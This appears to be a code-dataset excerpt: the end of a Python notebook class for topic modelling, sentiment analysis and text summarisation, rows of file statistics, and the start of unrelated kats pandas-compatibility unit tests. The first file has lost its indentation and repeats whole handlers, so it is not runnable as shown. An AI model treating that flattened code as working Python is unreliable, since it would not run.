lda_model = LatentDirichletAllocation(n_components=10, max_iter=10, learning_method='online')
lda_Z = lda_model.fit_transform(data_vectorized)
#clear_output()
#display(HBox([item for item in items]))
# Visualize the topics
pyLDAvis.enable_notebook()
panel = pyLDAvis.sklearn.prepare(lda_model, data_vectorized, vectorizer, mds='tsne')
display(panel)
def tm_change(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Explore topics through topic modelling. Select a feature with text values only.",layout=Layout(width='50%')))
display(widgets.Label(value="Please be patient while the output is generated. This may take a few moments.",layout=Layout(width='50%')))
#self.tm_drop=widgets.Dropdown(options=self.cols,value=self.cols[4],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.tm_drop)
#print(self.org_df[self.wc_drop.value].dtype)
#if is_string_dtype(self.org_df[self.wc_drop.value])==False:
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
data=self.org_df[self.tm_drop.value]
vectorizer = CountVectorizer(min_df=5, max_df=0.9,
stop_words='english', lowercase=True,
token_pattern='[a-zA-Z\-][a-zA-Z\-]{2,}')
data_vectorized = vectorizer.fit_transform(data)
# Build a Latent Dirichlet Allocation Model
lda_model = LatentDirichletAllocation(n_components=10, max_iter=10, learning_method='online')
lda_Z = lda_model.fit_transform(data_vectorized)
#clear_output()
#display(HBox([item for item in items]))
# Visualize the topics
pyLDAvis.enable_notebook()
panel = pyLDAvis.sklearn.prepare(lda_model, data_vectorized, vectorizer, mds='tsne')
display(panel)
self.tm_drop.observe(tm_change,'value')
except Exception as ve:
print(ve)
print("That is not a suitable feature for Topic Modelling. Select a feature with text values only.")
def tm_change(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Explore topics through topic modelling. Select a feature with text values only.",layout=Layout(width='50%')))
display(widgets.Label(value="Please be patient while the output is generated. This may take a few moments.",layout=Layout(width='50%')))
#self.tm_drop=widgets.Dropdown(options=self.cols,value=self.cols[4],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.tm_drop)
#print(self.org_df[self.wc_drop.value].dtype)
#if is_string_dtype(self.org_df[self.wc_drop.value])==False:
#raise ValueError("That is not a suitable feature to generate WordCloud. Select a feature with text values only.")
data=self.org_df[self.tm_drop.value]
vectorizer = CountVectorizer(min_df=5, max_df=0.9,
stop_words='english', lowercase=True,
token_pattern='[a-zA-Z\-][a-zA-Z\-]{2,}')
data_vectorized = vectorizer.fit_transform(data)
# Build a Latent Dirichlet Allocation Model
lda_model = LatentDirichletAllocation(n_components=10, max_iter=10, learning_method='online')
lda_Z = lda_model.fit_transform(data_vectorized)
#clear_output()
#display(HBox([item for item in items]))
# Visualize the topics
pyLDAvis.enable_notebook()
panel = pyLDAvis.sklearn.prepare(lda_model, data_vectorized, vectorizer, mds='tsne')
display(panel)
finally:
self.tm_drop.observe(tm_change,'value')
def sa_data(self,b):
try:
if self.sheet==None or self.sheet=="":
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display("Please change data settings before use")
else:
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Opinion mining. Select a feature with text values only.",layout=Layout(width='50%')))
display(widgets.Label(value="Please be patient while the output is generated. This may take a few moments.",layout=Layout(width='50%')))
self.sa_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.sa_drop)
all_reviews=self.org_df[self.sa_drop.value]
#sentiment analysis
analyser = SentimentIntensityAnalyzer()
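# VADER's compound score lies in [-1, 1]: reviews scoring >= 0.5 are bucketed
# as positive, <= -0.5 as negative, and everything in between as neutral.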
pos_entire=[]
neg_entire=[]
neutral_entire=[]
for review in all_reviews:
scores = analyser.polarity_scores(review)
if scores['compound']<=-0.5:
neg_entire.append(review)
if scores['compound']>=0.5:
pos_entire.append(review)
if scores['compound']>-0.5 and scores['compound']<0.5:
neutral_entire.append(review)
#clear_output()
#display(HBox([item for item in items]))
type_length=[len(pos_entire),len(neutral_entire),len(neg_entire)]
sent_type=['positive','neutral','negative']
plt.pie(type_length, labels=sent_type, startangle=90, autopct='%.1f%%')
plt.title('Sentiment distribution')
plt.show()
bars1 = [len(pos_entire)]
bars2 = [len(neutral_entire)]
bars3 = [len(neg_entire)]
sent_type=['positive','neutral','negative']
# set width of bar
barWidth = 0.25
# Set position of bar on X axis
r1 = np.arange(len(bars1))
r2 = [x + barWidth for x in r1]
r3 = [x + barWidth for x in r2]
# Make the plot
plt.figure(figsize=(15,10))
plt.bar(r1, bars1, width=barWidth, edgecolor='white', label='Positive')
plt.bar(r2, bars2, width=barWidth, edgecolor='white', label='Neutral')
plt.bar(r3, bars3, width=barWidth, edgecolor='white', label='Negative')
# Add xticks on the middle of the group bars
plt.xlabel('Group', fontweight='bold')
plt.xticks([r + barWidth for r in range(len(bars1))], ['Entire Cohort'])
# Create legend & Show graphic
plt.legend()
plt.title('Sentiment Distributions')
plt.show()
def sa_change(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Opinion mining. Select a feature with text values only.",layout=Layout(width='50%')))
display(widgets.Label(value="Please be patient while the output is generated. This may take a few moments.",layout=Layout(width='50%')))
#self.sa_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.sa_drop)
all_reviews=self.org_df[self.sa_drop.value]
#sentiment analysis
analyser = SentimentIntensityAnalyzer()
pos_entire=[]
neg_entire=[]
neutral_entire=[]
for review in all_reviews:
scores = analyser.polarity_scores(review)
if scores['compound']<=-0.5:
neg_entire.append(review)
if scores['compound']>=0.5:
pos_entire.append(review)
if scores['compound']>-0.5 and scores['compound']<0.5:
neutral_entire.append(review)
#clear_output()
#display(HBox([item for item in items]))
type_length=[len(pos_entire),len(neutral_entire),len(neg_entire)]
sent_type=['positive','neutral','negative']
plt.pie(type_length, labels=sent_type, startangle=90, autopct='%.1f%%')
plt.title('Sentiment distribution')
plt.show()
bars1 = [len(pos_entire)]
bars2 = [len(neutral_entire)]
bars3 = [len(neg_entire)]
sent_type=['positive','neutral','negative']
# set width of bar
barWidth = 0.25
# Set position of bar on X axis
r1 = np.arange(len(bars1))
r2 = [x + barWidth for x in r1]
r3 = [x + barWidth for x in r2]
# Make the plot
plt.figure(figsize=(15,10))
plt.bar(r1, bars1, width=barWidth, edgecolor='white', label='Positive')
plt.bar(r2, bars2, width=barWidth, edgecolor='white', label='Neutral')
plt.bar(r3, bars3, width=barWidth, edgecolor='white', label='Negative')
# Add xticks on the middle of the group bars
plt.xlabel('Group', fontweight='bold')
plt.xticks([r + barWidth for r in range(len(bars1))], ['Entire Cohort'])
# Create legend & Show graphic
plt.legend()
plt.title('Sentiment Distributions')
plt.show()
self.sa_drop.observe(sa_change,'value')
except Exception as ve:
print(ve)
print("That is not a suitable feature for Sentiment Analysis. Select a feature with text values only.")
def sa_change(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Opinion mining. Select a feature with text values only.",layout=Layout(width='50%')))
display(widgets.Label(value="Please be patient while the output is generated. This may take a few moments.",layout=Layout(width='50%')))
#self.sa_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.sa_drop)
all_reviews=self.org_df[self.sa_drop.value]
#sentiment analysis
analyser = SentimentIntensityAnalyzer()
pos_entire=[]
neg_entire=[]
neutral_entire=[]
for review in all_reviews:
scores = analyser.polarity_scores(review)
if scores['compound']<=-0.5:
neg_entire.append(review)
if scores['compound']>=0.5:
pos_entire.append(review)
if scores['compound']>-0.5 and scores['compound']<0.5:
neutral_entire.append(review)
#clear_output()
#display(HBox([item for item in items]))
type_length=[len(pos_entire),len(neutral_entire),len(neg_entire)]
sent_type=['positive','neutral','negative']
plt.pie(type_length, labels=sent_type, startangle=90, autopct='%.1f%%')
plt.title('Sentiment distribution')
plt.show()
bars1 = [len(pos_entire)]
bars2 = [len(neutral_entire)]
bars3 = [len(neg_entire)]
sent_type=['positive','neutral','negative']
# set width of bar
barWidth = 0.25
# Set position of bar on X axis
r1 = np.arange(len(bars1))
r2 = [x + barWidth for x in r1]
r3 = [x + barWidth for x in r2]
# Make the plot
plt.figure(figsize=(15,10))
plt.bar(r1, bars1, width=barWidth, edgecolor='white', label='Positive')
plt.bar(r2, bars2, width=barWidth, edgecolor='white', label='Neutral')
plt.bar(r3, bars3, width=barWidth, edgecolor='white', label='Negative')
# Add xticks on the middle of the group bars
plt.xlabel('Group', fontweight='bold')
plt.xticks([r + barWidth for r in range(len(bars1))], ['Entire Cohort'])
# Create legend & Show graphic
plt.legend()
plt.title('Sentiment Distributions')
plt.show()
finally:
self.sa_drop.observe(sa_change,'value')
def ts_data(self,b):
try:
if self.sheet==None or self.sheet=="":
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display("Please change data settings before use")
else:
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Select a feature with text values only.",layout=Layout(width='50%')))
display(widgets.Label(value="Please be patient while the output is generated. This may take a few moments.",layout=Layout(width='50%')))
self.ts_drop=widgets.Dropdown(options=self.cols,value=self.cols[0],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.ts_drop)
all_reviews=self.org_df[self.ts_drop.value]
pos_entire=[]
neg_entire=[]
neutral_entire=[]
analyser = SentimentIntensityAnalyzer()
for review in all_reviews:
scores = analyser.polarity_scores(review)
if scores['compound']<=-0.5:
neg_entire.append(review)
if scores['compound']>=0.5:
pos_entire.append(review)
if scores['compound']>-0.5 and scores['compound']<0.5:
neutral_entire.append(review)
#sentiment analysis
#clear_output()
#display(HBox([item for item in items]))
self.bpos = widgets.Button(description="Next positive text",button_style='success',layout=Layout(width='175px'))
self.bneg = widgets.Button(description="Next negative text",button_style='danger',layout=Layout(width='175px'))
self.bneu = widgets.Button(description="Next neutral text",button_style='info',layout=Layout(width='175px'))
display(HBox([self.bpos,self.bneu,self.bneg]))
########################################################################
def posref(b):
#clear_output()
#display(HBox([item for item in items]))
#display(HBox([bpos,bneu,bneg]))
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.ts_drop)
display(HBox([self.bpos,self.bneu,self.bneg]))
print("\nPositive Text\n")
display(pos_entire[0])
text_for_summ=pos_entire[0]
article_text = re.sub(r'\[[0-9]*\]', ' ', text_for_summ)
article_text = re.sub(r'\s+', ' ', article_text)
formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )
formatted_article_text = re.sub(r'\s+', ' ', formatted_article_text)
sentence_list = nl.sent_tokenize(article_text)
stopwords = nl.corpus.stopwords.words('english')
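# Frequency-based extractive summarization: count non-stopword frequencies,
# normalize by the most frequent word, score every sentence shorter than 30
# words by summing its word scores, then keep the 7 top-scoring sentences.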
word_frequencies = {}
for word in nl.word_tokenize(formatted_article_text):
if word not in stopwords:
if word not in word_frequencies.keys():
word_frequencies[word] = 1
else:
word_frequencies[word] += 1
maximum_frequncy = max(word_frequencies.values())
for word in word_frequencies.keys():
word_frequencies[word] = (word_frequencies[word]/maximum_frequncy)
sentence_scores = {}
for sent in sentence_list:
for word in nl.word_tokenize(sent.lower()):
if word in word_frequencies.keys():
if len(sent.split(' ')) < 30:
if sent not in sentence_scores.keys():
sentence_scores[sent] = word_frequencies[word]
else:
sentence_scores[sent] += word_frequencies[word]
import heapq
summary_sentences = heapq.nlargest(7, sentence_scores, key=sentence_scores.get)
summary = ' '.join(summary_sentences)
tokens = word_tokenize(summary)
tagged = pos_tag(tokens)
visualizer = PosTagVisualizer()
visualizer.transform(tagged)
#print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
display('===================================SUMMARY=========================================================')
#display(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print('\n')
item_rem=pos_entire.pop(0)
pos_entire.append(item_rem)
self.bpos.on_click(posref)
def neuref(b):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.ts_drop)
display(HBox([self.bpos,self.bneu,self.bneg]))
print("\nNeutral Text\n")
display(neutral_entire[0])
text_for_summ=neutral_entire[0]
article_text = re.sub(r'\[[0-9]*\]', ' ', text_for_summ)
article_text = re.sub(r'\s+', ' ', article_text)
formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )
formatted_article_text = re.sub(r'\s+', ' ', formatted_article_text)
sentence_list = nl.sent_tokenize(article_text)
stopwords = nl.corpus.stopwords.words('english')
word_frequencies = {}
for word in nl.word_tokenize(formatted_article_text):
if word not in stopwords:
if word not in word_frequencies.keys():
word_frequencies[word] = 1
else:
word_frequencies[word] += 1
maximum_frequncy = max(word_frequencies.values())
for word in word_frequencies.keys():
word_frequencies[word] = (word_frequencies[word]/maximum_frequncy)
sentence_scores = {}
for sent in sentence_list:
for word in nl.word_tokenize(sent.lower()):
if word in word_frequencies.keys():
if len(sent.split(' ')) < 30:
if sent not in sentence_scores.keys():
sentence_scores[sent] = word_frequencies[word]
else:
sentence_scores[sent] += word_frequencies[word]
import heapq
summary_sentences = heapq.nlargest(7, sentence_scores, key=sentence_scores.get)
summary = ' '.join(summary_sentences)
tokens = word_tokenize(summary)
tagged = pos_tag(tokens)
visualizer = PosTagVisualizer()
visualizer.transform(tagged)
display('===================================SUMMARY=========================================================')
#display(summary)
print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print('\n')
item_rem=neutral_entire.pop(0)
neutral_entire.append(item_rem)
self.bneu.on_click(neuref)
def negref(b):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.ts_drop)
display(HBox([self.bpos,self.bneu,self.bneg]))
print("\nNegative Text\n")
display(neg_entire[0])
text_for_summ=neg_entire[0]
article_text = re.sub(r'\[[0-9]*\]', ' ', text_for_summ)
article_text = re.sub(r'\s+', ' ', article_text)
formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )
formatted_article_text = re.sub(r'\s+', ' ', formatted_article_text)
sentence_list = nl.sent_tokenize(article_text)
stopwords = nl.corpus.stopwords.words('english')
word_frequencies = {}
for word in nl.word_tokenize(formatted_article_text):
if word not in stopwords:
if word not in word_frequencies.keys():
word_frequencies[word] = 1
else:
word_frequencies[word] += 1
maximum_frequncy = max(word_frequencies.values())
for word in word_frequencies.keys():
word_frequencies[word] = (word_frequencies[word]/maximum_frequncy)
sentence_scores = {}
for sent in sentence_list:
for word in nl.word_tokenize(sent.lower()):
if word in word_frequencies.keys():
if len(sent.split(' ')) < 30:
if sent not in sentence_scores.keys():
sentence_scores[sent] = word_frequencies[word]
else:
sentence_scores[sent] += word_frequencies[word]
import heapq
summary_sentences = heapq.nlargest(7, sentence_scores, key=sentence_scores.get)
summary = ' '.join(summary_sentences)
tokens = word_tokenize(summary)
tagged = pos_tag(tokens)
visualizer = PosTagVisualizer()
visualizer.transform(tagged)
display('===================================SUMMARY=========================================================')
#display(summary)
print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print('\n')
item_rem=neg_entire.pop(0)
neg_entire.append(item_rem)
self.bneg.on_click(negref)
def ts_change(change):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(widgets.Label(value="Select a feature with text values only.",layout=Layout(width='50%')))
display(widgets.Label(value="Please be patient while the output is generated. This may take a few moments.",layout=Layout(width='50%')))
#self.ts_drop=widgets.Dropdown(options=self.cols,value=self.cols[4],layout=Layout(width='50%'),description='Feature:',tooltip='Select a feature to generate wordcloud',disabled=False,)
display(self.ts_drop)
all_reviews=self.org_df[self.ts_drop.value]
pos_entire=[]
neg_entire=[]
neutral_entire=[]
analyser = SentimentIntensityAnalyzer()
for review in all_reviews:
scores = analyser.polarity_scores(review)
if scores['compound']<=-0.5:
neg_entire.append(review)
if scores['compound']>=0.5:
pos_entire.append(review)
if scores['compound']>-0.5 and scores['compound']<0.5:
neutral_entire.append(review)
#sentiment analysis
#clear_output()
#display(HBox([item for item in items]))
self.bpos = widgets.Button(description="Next positive text",button_style='success',layout=Layout(width='175px'))
self.bneg = widgets.Button(description="Next negative text",button_style='danger',layout=Layout(width='175px'))
self.bneu = widgets.Button(description="Next neutral text",button_style='info',layout=Layout(width='175px'))
display(HBox([self.bpos,self.bneu,self.bneg]))
########################################################################
def posref(b):
#clear_output()
#display(HBox([item for item in items]))
#display(HBox([bpos,bneu,bneg]))
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.ts_drop)
display(HBox([self.bpos,self.bneu,self.bneg]))
print("\nPositive Text\n")
display(pos_entire[0])
text_for_summ=pos_entire[0]
article_text = re.sub(r'\[[0-9]*\]', ' ', text_for_summ)
article_text = re.sub(r'\s+', ' ', article_text)
formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )
formatted_article_text = re.sub(r'\s+', ' ', formatted_article_text)
sentence_list = nl.sent_tokenize(article_text)
stopwords = nl.corpus.stopwords.words('english')
word_frequencies = {}
for word in nl.word_tokenize(formatted_article_text):
if word not in stopwords:
if word not in word_frequencies.keys():
word_frequencies[word] = 1
else:
word_frequencies[word] += 1
maximum_frequency = max(word_frequencies.values())
for word in word_frequencies.keys():
word_frequencies[word] = word_frequencies[word] / maximum_frequency
sentence_scores = {}
for sent in sentence_list:
for word in nl.word_tokenize(sent.lower()):
if word in word_frequencies.keys():
if len(sent.split(' ')) < 30:
if sent not in sentence_scores.keys():
sentence_scores[sent] = word_frequencies[word]
else:
sentence_scores[sent] += word_frequencies[word]
import heapq
summary_sentences = heapq.nlargest(7, sentence_scores, key=sentence_scores.get)
summary = ' '.join(summary_sentences)
tokens = word_tokenize(summary)
tagged = pos_tag(tokens)
visualizer = PosTagVisualizer()
visualizer.transform(tagged)
#print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
display('===================================SUMMARY=========================================================')
#display(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print('\n')
item_rem=pos_entire.pop(0)
pos_entire.append(item_rem)
self.bpos.on_click(posref)
def neuref(b):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.ts_drop)
display(HBox([self.bpos,self.bneu,self.bneg]))
print("\nNeutral Text\n")
display(neutral_entire[0])
text_for_summ=neutral_entire[0]
article_text = re.sub(r'\[[0-9]*\]', ' ', text_for_summ)
article_text = re.sub(r'\s+', ' ', article_text)
formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )
formatted_article_text = re.sub(r'\s+', ' ', formatted_article_text)
sentence_list = nl.sent_tokenize(article_text)
stopwords = nl.corpus.stopwords.words('english')
word_frequencies = {}
for word in nl.word_tokenize(formatted_article_text):
if word not in stopwords:
if word not in word_frequencies.keys():
word_frequencies[word] = 1
else:
word_frequencies[word] += 1
maximum_frequency = max(word_frequencies.values())
for word in word_frequencies.keys():
word_frequencies[word] = word_frequencies[word] / maximum_frequency
sentence_scores = {}
for sent in sentence_list:
for word in nl.word_tokenize(sent.lower()):
if word in word_frequencies.keys():
if len(sent.split(' ')) < 30:
if sent not in sentence_scores.keys():
sentence_scores[sent] = word_frequencies[word]
else:
sentence_scores[sent] += word_frequencies[word]
import heapq
summary_sentences = heapq.nlargest(7, sentence_scores, key=sentence_scores.get)
summary = ' '.join(summary_sentences)
tokens = word_tokenize(summary)
tagged = pos_tag(tokens)
visualizer = PosTagVisualizer()
visualizer.transform(tagged)
display('===================================SUMMARY=========================================================')
#display(summary)
print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print('\n')
item_rem=neutral_entire.pop(0)
neutral_entire.append(item_rem)
self.bneu.on_click(neuref)
def negref(b):
clear_output()
display(HBox([item for item in self.items]))
display(self.import_data)
display(self.ts_drop)
display(HBox([self.bpos,self.bneu,self.bneg]))
print("\nNegative Text\n")
display(neg_entire[0])
text_for_summ=neg_entire[0]
article_text = re.sub(r'\[[0-9]*\]', ' ', text_for_summ)
article_text = re.sub(r'\s+', ' ', article_text)
formatted_article_text = re.sub('[^a-zA-Z]', ' ', article_text )
formatted_article_text = re.sub(r'\s+', ' ', formatted_article_text)
sentence_list = nl.sent_tokenize(article_text)
stopwords = nl.corpus.stopwords.words('english')
word_frequencies = {}
for word in nl.word_tokenize(formatted_article_text):
if word not in stopwords:
if word not in word_frequencies.keys():
word_frequencies[word] = 1
else:
word_frequencies[word] += 1
maximum_frequency = max(word_frequencies.values())
for word in word_frequencies.keys():
word_frequencies[word] = word_frequencies[word] / maximum_frequency
sentence_scores = {}
for sent in sentence_list:
for word in nl.word_tokenize(sent.lower()):
if word in word_frequencies.keys():
if len(sent.split(' ')) < 30:
if sent not in sentence_scores.keys():
sentence_scores[sent] = word_frequencies[word]
else:
sentence_scores[sent] += word_frequencies[word]
import heapq
summary_sentences = heapq.nlargest(7, sentence_scores, key=sentence_scores.get)
summary = ' '.join(summary_sentences)
tokens = word_tokenize(summary)
tagged = pos_tag(tokens)
visualizer = PosTagVisualizer()
visualizer.transform(tagged)
display('===================================SUMMARY=========================================================')
#display(summary)
print(' '.join((visualizer.colorize(token, color) for color, token in visualizer.tagged)))
print('\n')
item_rem=neg_entire.pop(0)
neg_entire.append(item_rem)
self.bneg.on_click(negref)
self.ts_drop.observe(ts_change,'value')
except Exception as ve:
print(ve)
print("That is not a suitable feature for Sentiment Analysis. Select a feature with text values only.")
finally:
self.ts_drop.observe(ts_change,'value')
# In[117]:
def main():
obj=SSP()
# In[118]:
if __name__=='__main__':
import warnings
warnings.filterwarnings('ignore')  # `np.warnings` was removed in NumPy 1.24+
main()
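# The posref/neuref/negref handlers above repeat the same frequency-based
# summarization verbatim. A minimal sketch of a shared helper they could all
# call instead (assuming nltk with the punkt and stopwords data installed,
# matching the `nl` alias used above):
import re
import heapq
import nltk as nl

def summarize_text(text, top_n=7, max_sent_len=30):
    # Strip citation markers like [12] and collapse whitespace.
    article_text = re.sub(r'\[[0-9]*\]', ' ', text)
    article_text = re.sub(r'\s+', ' ', article_text)
    # Letters-only copy used for word frequencies.
    letters_only = re.sub('[^a-zA-Z]', ' ', article_text)
    letters_only = re.sub(r'\s+', ' ', letters_only)
    stop = set(nl.corpus.stopwords.words('english'))
    freq = {}
    for word in nl.word_tokenize(letters_only):
        if word not in stop:
            freq[word] = freq.get(word, 0) + 1
    if not freq:
        return ''
    top = max(freq.values())
    freq = {w: f / top for w, f in freq.items()}
    # Score sentences shorter than max_sent_len tokens by summed word weights.
    scores = {}
    for sent in nl.sent_tokenize(article_text):
        if len(sent.split(' ')) < max_sent_len:
            for word in nl.word_tokenize(sent.lower()):
                if word in freq:
                    scores[sent] = scores.get(sent, 0.0) + freq[word]
    return ' '.join(heapq.nlargest(top_n, scores, key=scores.get))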
| 43.022972
| 225
| 0.499858
| 8,768
| 88,025
| 4.87979
| 0.070027
| 0.034708
| 0.022648
| 0.02398
| 0.890969
| 0.880335
| 0.877109
| 0.871944
| 0.870098
| 0.864722
| 0
| 0.014209
| 0.385175
| 88,025
| 2,045
| 226
| 43.04401
| 0.776367
| 0.085964
| 0
| 0.849693
| 0
| 0
| 0.100139
| 0.012405
| 0
| 0
| 0
| 0.000489
| 0
| 1
| 0.02684
| false
| 0
| 0.075153
| 0.000767
| 0.104294
| 0.035276
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9649ec5f99e1946cbd7869af31d388b45ab5c531
| 154
|
py
|
Python
|
src/ctc/db/schemas/contract_abis/__init__.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 94
|
2022-02-15T19:34:49.000Z
|
2022-03-26T19:26:22.000Z
|
src/ctc/db/schemas/contract_abis/__init__.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 7
|
2022-03-03T02:58:47.000Z
|
2022-03-11T18:41:05.000Z
|
src/ctc/db/schemas/contract_abis/__init__.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 7
|
2022-02-15T17:53:07.000Z
|
2022-03-17T19:14:17.000Z
|
from .contract_abis_intake import *
from .contract_abis_queries import *
from .contract_abis_schema_defs import *
from .contract_abis_statements import *
| 30.8
| 40
| 0.844156
| 21
| 154
| 5.761905
| 0.428571
| 0.396694
| 0.528926
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103896
| 154
| 4
| 41
| 38.5
| 0.876812
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
965639b56a0c354898c0ebfaeb987a83f421f419
| 8,951
|
py
|
Python
|
kats/tests/compat/test_pandas.py
|
utkucanaytac/Kats
|
9781615750a2f3b49f16cccf335b5c29fdfd181a
|
[
"MIT"
] | null | null | null |
kats/tests/compat/test_pandas.py
|
utkucanaytac/Kats
|
9781615750a2f3b49f16cccf335b5c29fdfd181a
|
[
"MIT"
] | null | null | null |
kats/tests/compat/test_pandas.py
|
utkucanaytac/Kats
|
9781615750a2f3b49f16cccf335b5c29fdfd181a
|
[
"MIT"
] | null | null | null |
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import inspect
import unittest
from typing import Any, Dict
from unittest.mock import ANY, patch
import pandas as pd
from kats.compat import compat, pandas
class TestPandas(unittest.TestCase):
assert_frame_equal_args: Dict[str, Any] = {}
assert_series_equal_args: Dict[str, Any] = {}
assert_index_equal_args: Dict[str, Any] = {}
def setUp(self) -> None:
for method in (
"assert_frame_equal",
"assert_series_equal",
"assert_index_equal",
):
args = {}
setattr(self, f"{method}_args", args)
for k in inspect.signature(getattr(pandas, method)).parameters:
if k not in {"left", "right"}:
args[k] = ANY
def test_version(self) -> None:
self.assertTrue(pandas.version == compat.Version("pandas"))
@patch("kats.compat.pandas.version", compat.Version("1.0"))
@patch("kats.compat.pandas.pdt.assert_frame_equal")
# pyre-fixme[2]: Parameter annotation cannot be `Any`.
def test_assert_frame_equal_10(self, assert_frame_equal: Any) -> None:
assert_frame_equal.return_value = False
df = pd.DataFrame()
result = pandas.assert_frame_equal(
df, df, check_less_precise=2, check_flags=False, check_freq=False, rtol=0.5
)
self.assertFalse(result)
args = dict(self.assert_frame_equal_args)
args["check_less_precise"] = 2
# drop args from other versions
del args["rtol"]
del args["atol"]
del args["check_freq"]
del args["check_flags"]
assert_frame_equal.assert_called_once_with(df, df, **args)
@patch("kats.compat.pandas.version", compat.Version("1.1"))
@patch("kats.compat.pandas.pdt.assert_frame_equal")
# pyre-fixme[2]: Parameter annotation cannot be `Any`.
def test_assert_frame_equal_11(self, assert_frame_equal: Any) -> None:
assert_frame_equal.return_value = False
df = pd.DataFrame()
result = pandas.assert_frame_equal(
df, df, check_less_precise=2, check_flags=False, rtol=0.001
)
self.assertFalse(result)
args = dict(self.assert_frame_equal_args)
args["rtol"] = 0.001
# drop args from other versions
del args["check_less_precise"]
del args["check_flags"]
assert_frame_equal.assert_called_once_with(df, df, **args)
@patch("kats.compat.pandas.version", compat.Version("1.2"))
@patch("kats.compat.pandas.pdt.assert_frame_equal")
# pyre-fixme[2]: Parameter annotation cannot be `Any`.
def test_assert_frame_equal_12(self, assert_frame_equal: Any) -> None:
assert_frame_equal.return_value = False
df = pd.DataFrame()
result = pandas.assert_frame_equal(df, df, check_less_precise=2, rtol=0.001)
self.assertFalse(result)
args = dict(self.assert_frame_equal_args)
# drop args from other versions
del args["check_less_precise"]
args["rtol"] = 0.001
assert_frame_equal.assert_called_once_with(df, df, **args)
@patch("kats.compat.pandas.version", compat.Version("1.0"))
@patch("kats.compat.pandas.pdt.assert_index_equal")
@patch("kats.compat.pandas.pdt.assert_series_equal")
def test_assert_series_equal_10(
# pyre-fixme[2]: Parameter annotation cannot be `Any`.
self, assert_series_equal: Any, assert_index_equal: Any
) -> None:
assert_series_equal.return_value = False
s = pd.Series(dtype=int)
result = pandas.assert_series_equal(
s, s, check_less_precise=2, check_flags=False, check_freq=False, rtol=0.5
)
self.assertFalse(result)
args = dict(self.assert_series_equal_args)
args["check_less_precise"] = 2
# drop args from other versions
del args["check_category_order"]
del args["check_freq"]
del args["check_flags"]
del args["rtol"]
del args["atol"]
del args["check_index"]
assert_series_equal.assert_called_once_with(s, s, **args)
@patch("kats.compat.pandas.version", compat.Version("1.0.2"))
@patch("kats.compat.pandas.pdt.assert_index_equal")
@patch("kats.compat.pandas.pdt.assert_series_equal")
def test_assert_series_equal_102(
# pyre-fixme[2]: Parameter annotation cannot be `Any`.
self, assert_series_equal: Any, assert_index_equal: Any
) -> None:
# Check that on pandas 1.0.2, `check_less_precise` is passed and not later args
assert_series_equal.return_value = False
